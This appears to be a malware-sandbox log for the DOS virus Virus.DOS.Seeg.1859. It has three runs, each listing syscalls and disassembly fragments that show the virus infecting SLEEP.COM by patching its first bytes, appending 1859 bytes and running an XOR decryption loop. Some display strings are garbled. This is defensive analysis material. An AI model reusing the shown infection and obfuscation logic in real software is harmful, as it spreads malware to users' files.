Sample viewer

vx.netlux.org/Virus.DOS.Seeg.1859

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:16:06.832484358Z 53 PC: 12f4c | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:16:06.835114419Z 37 PC: 12f5f | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:16:06.836390035Z 73 PC: 12d8e | Release memory
2018-12-17T22:16:06.837770812Z 72 PC: 12d9b | Allocate memory
2018-12-17T22:16:06.839504161Z 74 PC: 12da9 | Reallocate memory
2018-12-17T22:16:06.841531485Z 72 PC: 12db1 | Allocate memory
2018-12-17T22:16:06.843291575Z 44 PC: 12dc9 | Get time 0x12dc9: cmp dh, 0x22
0x12dcc: jne 0x12dd1
0x12dce: call 0x12eef
0x12dd1: push es
0x12dd2: call 0x1300f
0x12dd5: pop es
0x12dd6: call 0x13109
0x12dd9: lea si, word ptr [bp + 0x39e]
0x12ddd: mov ax, dx
0x12ddf: xor bx, bx
0x12de1: call 0x12f19
0x12de4: xor ax, 0x1234
0x12de7: call 0x12f19
0x12dea: mov ax, word ptr [si]
0x12dec: xor ah, ah
0x12dee: mov bl, 2
0x12df0: div bl
0x12df2: xor ah, ah
0x12df4: mov byte ptr [bp + 0x3ad], al
0x12df8: push si
2018-12-17T22:16:06.846282937Z 26 PC: 1312a | Set disk transfer address
2018-12-17T22:16:06.847854864Z 78 PC: 13133 | Find first file
2018-12-17T22:16:06.851740644Z 67 PC: 1319c | Get or set file attributes
2018-12-17T22:16:06.864090391Z 61 PC: 131ad | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:16:06.871423493Z 66 PC: 131bc | Move file pointer
2018-12-17T22:16:06.873289425Z 63 PC: 131c7 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:16:06.880121645Z 66 PC: 131ef | Move file pointer
2018-12-17T22:16:06.883823463Z 64 PC: 131fa | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:16:06.887077592Z 66 PC: 13202 | Move file pointer
2018-12-17T22:16:06.889004093Z 64 PC: 13211 | Write file or device (Write 225 bytes on handle 5)
2018-12-17T22:16:06.898439793Z 44 PC: 13215 | Get time 0x13215: push ds
0x13216: mov cx, 0x381
0x13219: mov si, 0x8a
0x1321c: mov word ptr es:[0x23], dx
0x13221: xor word ptr es:[si], dx
0x13224: inc si
0x13225: sub dx, 0xdead
0x13229: inc si
0x1322a: loop 0x13221
0x1322c: push bx
0x1322d: xor ax, ax
0x1322f: mov al, byte ptr [bp + 0x3ae]
0x13233: mov bl, 3
0x13235: mul bl
0x13237: add ax, 3
0x1323a: mov word ptr [bp + 0x3af], ax
0x1323e: lea si, word ptr [bp + 0x2aa]
0x13242: xor di, di
0x13244: movsb byte ptr es:[di], byte ptr [si]
0x13245: mov bx, word ptr [bp + 0x27c]
2018-12-17T22:16:06.90237356Z 64 PC: 132b1 | Write file or device (Write 16 bytes on handle 5)
2018-12-17T22:16:06.905761631Z 64 PC: 132bc | Write file or device (Write 1859 bytes on handle 5)
2018-12-17T22:16:06.915389458Z 87 PC: 132d1 | Get or set file date and time
2018-12-17T22:16:06.91737672Z 62 PC: 132d5 | Close file
2018-12-17T22:16:06.924926184Z 37 PC: 12f46 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:16:06.926483316Z 73 PC: 132de | Release memory
2018-12-17T22:16:06.92869152Z 9 PC: 12a4a | Display string (String= ' ������ 䠩�� 320 ���� ')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":2903,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:47:42.497320407Z 53 PC: 12f4c | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:47:42.499104285Z 37 PC: 12f5f | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:47:42.500460543Z 73 PC: 12d8e | Release memory
2018-12-25T11:47:42.501788928Z 72 PC: 12d9b | Allocate memory
2018-12-25T11:47:42.50426887Z 74 PC: 12da9 | Reallocate memory
2018-12-25T11:47:42.505513396Z 72 PC: 12db1 | Allocate memory
2018-12-25T11:47:42.507029238Z 44 PC: 12dc9 | Get time 0x12dc9: cmp dh, 0x22
0x12dcc: jne 0x12dd1
0x12dce: call 0x12eef
0x12dd1: push es
0x12dd2: call 0x1300f
0x12dd5: pop es
0x12dd6: call 0x13109
0x12dd9: lea si, word ptr [bp + 0x39e]
0x12ddd: mov ax, dx
0x12ddf: xor bx, bx
0x12de1: call 0x12f19
0x12de4: xor ax, 0x1234
0x12de7: call 0x12f19
0x12dea: mov ax, word ptr [si]
0x12dec: xor ah, ah
0x12dee: mov bl, 2
0x12df0: div bl
0x12df2: xor ah, ah
0x12df4: mov byte ptr [bp + 0x3ad], al
0x12df8: push si
2018-12-25T11:47:42.509828814Z 26 PC: 1312a | Set disk transfer address
2018-12-25T11:47:42.510793157Z 78 PC: 13133 | Find first file
2018-12-25T11:47:42.514943027Z 67 PC: 1319c | Get or set file attributes
2018-12-25T11:47:42.778398361Z 61 PC: 131ad | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:47:42.78576731Z 66 PC: 131bc | Move file pointer
2018-12-25T11:47:42.787284347Z 63 PC: 131c7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:47:42.793931099Z 66 PC: 131ef | Move file pointer
2018-12-25T11:47:42.796109727Z 64 PC: 131fa | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:47:42.798955032Z 66 PC: 13202 | Move file pointer
2018-12-25T11:47:42.800236702Z 64 PC: 13211 | Write file or device (Write 33 bytes on handle 5)
2018-12-25T11:47:42.809103771Z 44 PC: 13215 | Get time 0x13215: push ds
0x13216: mov cx, 0x381
0x13219: mov si, 0x8a
0x1321c: mov word ptr es:[0x23], dx
0x13221: xor word ptr es:[si], dx
0x13224: inc si
0x13225: sub dx, 0xdead
0x13229: inc si
0x1322a: loop 0x13221
0x1322c: push bx
0x1322d: xor ax, ax
0x1322f: mov al, byte ptr [bp + 0x3ae]
0x13233: mov bl, 3
0x13235: mul bl
0x13237: add ax, 3
0x1323a: mov word ptr [bp + 0x3af], ax
0x1323e: lea si, word ptr [bp + 0x2aa]
0x13242: xor di, di
0x13244: movsb byte ptr es:[di], byte ptr [si]
0x13245: mov bx, word ptr [bp + 0x27c]
2018-12-25T11:47:42.815108486Z 64 PC: 132b1 | Write file or device (Write 16 bytes on handle 5)
2018-12-25T11:47:42.817963225Z 64 PC: 132bc | Write file or device (Write 1859 bytes on handle 5)
2018-12-25T11:47:42.82682469Z 87 PC: 132d1 | Get or set file date and time
2018-12-25T11:47:42.828221391Z 62 PC: 132d5 | Close file
2018-12-25T11:47:42.835893979Z 37 PC: 12f46 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:47:42.83766157Z 73 PC: 132de | Release memory
2018-12-25T11:47:42.838864328Z 9 PC: 12a4a | Display string (String= ' ������ 䠩�� 320 ���� ')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":34,"TimeBased":true,"OriginalID":2903,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:47:42.702370007Z 53 PC: 12f4c | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:47:42.703774841Z 37 PC: 12f5f | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:47:42.704697615Z 73 PC: 12d8e | Release memory
2018-12-25T11:47:42.705696868Z 72 PC: 12d9b | Allocate memory
2018-12-25T11:47:42.707522291Z 74 PC: 12da9 | Reallocate memory
2018-12-25T11:47:42.708511862Z 72 PC: 12db1 | Allocate memory
2018-12-25T11:47:42.709544345Z 44 PC: 12dc9 | Get time 0x12dc9: cmp dh, 0x22
0x12dcc: jne 0x12dd1
0x12dce: call 0x12eef
0x12dd1: push es
0x12dd2: call 0x1300f
0x12dd5: pop es
0x12dd6: call 0x13109
0x12dd9: lea si, word ptr [bp + 0x39e]
0x12ddd: mov ax, dx
0x12ddf: xor bx, bx
0x12de1: call 0x12f19
0x12de4: xor ax, 0x1234
0x12de7: call 0x12f19
0x12dea: mov ax, word ptr [si]
0x12dec: xor ah, ah
0x12dee: mov bl, 2
0x12df0: div bl
0x12df2: xor ah, ah
0x12df4: mov byte ptr [bp + 0x3ad], al
0x12df8: push si
2018-12-25T11:47:42.711987496Z 26 PC: 1312a | Set disk transfer address
2018-12-25T11:47:42.713162709Z 78 PC: 13133 | Find first file
2018-12-25T11:47:42.719257174Z 67 PC: 1319c | Get or set file attributes
2018-12-25T11:47:42.778622983Z 61 PC: 131ad | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:47:42.785354307Z 66 PC: 131bc | Move file pointer
2018-12-25T11:47:42.786981433Z 63 PC: 131c7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:47:42.791603282Z 66 PC: 131ef | Move file pointer
2018-12-25T11:47:42.792558133Z 64 PC: 131fa | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:47:42.794556789Z 66 PC: 13202 | Move file pointer
2018-12-25T11:47:42.802451908Z 64 PC: 13211 | Write file or device (Write 71 bytes on handle 5)
2018-12-25T11:47:42.804989844Z 44 PC: 13215 | Get time 0x13215: push ds
0x13216: mov cx, 0x381
0x13219: mov si, 0x8a
0x1321c: mov word ptr es:[0x23], dx
0x13221: xor word ptr es:[si], dx
0x13224: inc si
0x13225: sub dx, 0xdead
0x13229: inc si
0x1322a: loop 0x13221
0x1322c: push bx
0x1322d: xor ax, ax
0x1322f: mov al, byte ptr [bp + 0x3ae]
0x13233: mov bl, 3
0x13235: mul bl
0x13237: add ax, 3
0x1323a: mov word ptr [bp + 0x3af], ax
0x1323e: lea si, word ptr [bp + 0x2aa]
0x13242: xor di, di
0x13244: movsb byte ptr es:[di], byte ptr [si]
0x13245: mov bx, word ptr [bp + 0x27c]
2018-12-25T11:47:42.810123709Z 64 PC: 132b1 | Write file or device (Write 25 bytes on handle 5)
2018-12-25T11:47:42.812892331Z 64 PC: 132bc | Write file or device (Write 1859 bytes on handle 5)
2018-12-25T11:47:42.821413505Z 87 PC: 132d1 | Get or set file date and time
2018-12-25T11:47:42.822694693Z 62 PC: 132d5 | Close file
2018-12-25T11:47:42.830286958Z 37 PC: 12f46 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:47:42.831626461Z 73 PC: 132de | Release memory
2018-12-25T11:47:42.832721068Z 9 PC: 12a4a | Display string (String= ' ������ 䠩�� 320 ���� ')